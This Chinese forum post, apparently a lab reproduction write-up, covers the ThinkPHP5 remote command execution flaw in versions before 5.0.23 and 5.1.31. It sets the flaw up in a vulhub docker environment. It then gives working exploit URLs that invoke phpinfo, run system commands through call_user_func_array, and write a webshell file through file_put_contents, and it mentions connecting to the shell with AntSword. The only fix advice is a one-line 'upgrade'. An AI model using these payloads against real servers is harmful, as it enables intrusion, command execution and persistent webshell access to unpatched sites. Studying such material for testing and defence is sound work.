ThinkPHP5 远程命令执行漏洞

打印 上一主题 下一主题

主题 637|帖子 637|积分 1911

一、ThinkPHP介绍

轻量级框架,内部OOP和面向过程代码都存在,是国人自己开发的框架。 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式
二、漏洞描述

Thinkphp5.0版本中没有对路由中的控制器进行严格过滤,导致在没有开启强制路由的情况下可以执行系统命令。
三、漏洞影响版本

ThinkPHP 5.0.x < 5.0.23
ThinkPHP 5.1.x < 5.1.31
四、漏洞复现

1、搭建环境
这里使用docker直接启动vulhub靶场
  1. docker-compose up -d
复制代码
目录:thinkphp/5-rce

2、访问页面
  1. http://your-ip:8080
复制代码

 3、代码执行
  1. /index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
  2. /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd
复制代码
获取phpinfo信息

 执行系统命令

  4、写入一句话
  1. /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码
复制代码


 蚁剑连接

 
五、修复建议

升级至最新版本
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

傲渊山岳

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表